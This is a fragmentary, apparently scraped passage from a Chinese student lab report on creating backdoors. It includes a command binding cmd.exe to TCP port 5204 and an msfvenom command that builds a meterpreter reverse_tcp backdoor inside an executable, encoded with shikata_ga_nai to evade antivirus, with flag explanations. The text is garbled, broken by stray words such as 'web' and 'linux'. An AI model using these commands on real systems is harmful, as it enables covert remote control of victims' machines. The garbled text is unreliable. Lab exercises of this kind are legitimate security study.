crontab -e
指令编辑定时任务。(前面的数字是你想要让他在每一个小时的某分钟运行)tcp-listen:5204 exec:cmd.exe,pty,stderr
,用来将cmd.exe绑定到端口5204,同时把cmd.exe的stderr重定向到stdout上。msfvenom -p windows/meterpreter/reverse_tcp -x ./20155204.exe -e x86/shikata_ga_nai -i 5 -b ‘\x00’ LHOST=1 LPORT=5204 -f exe > 20155204_backdoor.exe
-p 使用的payload。payload翻译为有效载荷,就是被运输有东西。这里windows/meterpreter/reverse_tcp就是一段shellcode. -x 使用的可执行文件模板,payload(shellcode)就写入到这个可执行文件中。 -e 使用的编码器,用于对shellcode变形,为了免杀。 -i 编码器的迭代次数。如上即便用该编码器编码5次。 -b badchar是payload中须要去除的字符。 LHOST 是反弹回连的IP LPORT 是回连的端口 -f 生成文件的类型 > 输出到哪一个文件
这里必定注意理解反弹端口的意义,以及LHOST的意义,不要像我同样,把LHOST一直设成了被攻击主机的IP。。。(下面这个是错误图片)
前端
exploit
linux便得到了远程控制的shell
linux
此次实验让我感觉到了本身系统的安全性,在黑客面前就想他们口中的肉鸡同样,这让我更加认识到了信息安全的重要性。web